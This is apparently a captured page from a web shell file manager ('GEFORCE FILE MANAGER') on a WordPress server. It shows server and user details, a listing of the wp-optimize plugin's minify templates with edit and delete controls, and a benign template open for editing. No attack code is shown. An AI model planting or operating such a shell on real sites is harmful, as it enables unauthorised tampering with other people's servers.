[ SYSTEM ]: Linux wordpress 6.1.0-44-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.164-1 (2026-03-09) x86_64
[ SERVER ]: Apache/2.4.66 (Debian) | PHP: 8.2.30
[ USER ]: www-data | IP: 172.19.30.54
GEFORCE FILE MANAGER
/
var
/
www
/
html
/
wordpress
/
wp-content
/
plugins
/
wp-optimize
/
templates
/
minify
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 advanced-tab.php
14,270 B
SET
[ EDIT ]
|
[ DEL ]
📄 analytics-settings-tab.php
3,276 B
SET
[ EDIT ]
|
[ DEL ]
📄 asset-preload.php
1,094 B
SET
[ EDIT ]
|
[ DEL ]
📄 cached-file-log.php
1,662 B
SET
[ EDIT ]
|
[ DEL ]
📄 cached-file.php
1,025 B
SET
[ EDIT ]
|
[ DEL ]
📄 capo-js.php
1,031 B
SET
[ EDIT ]
|
[ DEL ]
📄 css-settings-tab.php
9,963 B
SET
[ EDIT ]
|
[ DEL ]
📄 font-settings-tab.php
9,545 B
SET
[ EDIT ]
|
[ DEL ]
📄 html-settings-tab.php
297 B
SET
[ EDIT ]
|
[ DEL ]
📄 js-settings-tab.php
12,912 B
SET
[ EDIT ]
|
[ DEL ]
📄 preload-tab.php
1,989 B
SET
[ EDIT ]
|
[ DEL ]
📄 settings-tab.php
5,552 B
SET
[ EDIT ]
|
[ DEL ]
📄 status-tab.php
12,792 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: cached-file.php
<?php if (!defined('WPO_VERSION')) die('No direct access allowed'); ?> <li id="<?php echo esc_attr($file['uid']); ?>"> <span class="filename"><a href="<?php echo esc_url($file['file_url']); ?>" target="_blank"><?php echo esc_html($file['filename']); ?></a> (<?php echo esc_html($file['fsize']); ?>)</span> <a href="#" class="log"><?php esc_html_e('Show information', 'wp-optimize'); ?></a> <a href="#" class="delete-file" data-filename='<?php echo esc_attr($file['filename']); ?>'><?php esc_html_e('Delete', 'wp-optimize'); ?></a> <div class="hidden save_notice"> <p><?php esc_html_e('The file was added to the list', 'wp-optimize'); ?></p> <p><button class="button button-primary save-exclusions"><?php esc_html_e('Save the changes', 'wp-optimize'); ?></button></p> </div> <div class="hidden wpo_min_log"><?php if ($file['log']) { WP_Optimize()->include_template( 'minify/cached-file-log.php', false, array( 'log' => $file['log'], 'minify_config' => $minify_config, ) ); } ?></div> </li>